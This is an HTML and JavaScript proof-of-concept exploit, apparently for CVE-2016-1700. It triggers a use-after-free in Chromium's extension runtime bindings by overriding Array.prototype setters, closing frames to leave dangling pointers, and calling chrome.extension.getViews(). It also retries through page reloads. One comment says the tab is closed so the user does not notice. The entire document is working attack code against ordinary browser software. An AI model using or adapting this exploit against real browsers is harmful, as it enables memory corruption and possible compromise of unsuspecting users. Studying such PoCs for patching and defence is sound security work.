<html>

<body>

<script>
var FRAME_COUNT = 10;
var onloads = [];
for (var i = 0; i < FRAME_COUNT; ++i) {
    onloads.push(new Promise(function(resolve) {
        var f = document.createElement('iframe');
        f.src = 'CVE-2016-1700_mainfast.json';
        f.onload = resolve;
        document.body.appendChild(f);
    }));
}
Promise.all(onloads).then(triggerUAF);

function triggerUAF() {
    Object.defineProperty(Array.prototype, '0', {
        get() {
            return this._v;
        },
        set(v) {
            this._v = v;

            if (Object.prototype.toString.call(v) === '[object Window]') {
                // Bye bye frames.
                document.body.textContent = '';
                // Close the tab so that the user doesn't notice.
                v.close();
                // Now because the RenderFrame* are dangling pointers,
                // a UAF will be triggered in
                // https://chromium.googlesource.com/chromium/src/+/f6f806674c4f6ebbb8b20197ae5b6c7a40bba08f/extensions/renderer/runtime_custom_bindings.cc#167
            }
        },
    });

    // Trigger RuntimeCustomBindings::GetExtensionViews
    // It will return the background page.
    chrome.extension.getViews();
    // The vector is sorted in pointer order, so it is most likely that the
    // exploit succeeds at the first time since the new frames are created
    // after the background page.
    // However, if the pointer addresses are randomized, then the probability
    // that the UAF is triggered is 1/FRAME_COUNT.
    // Reload the page in that case.
    // Limit to 10 attempts because I consider a probability of <1% negligible.
    if ((localStorage.x = parseInt(localStorage.x) + 1 || 0) < 10) {
        location.reload();
    }
}
</script>

</body>

</html>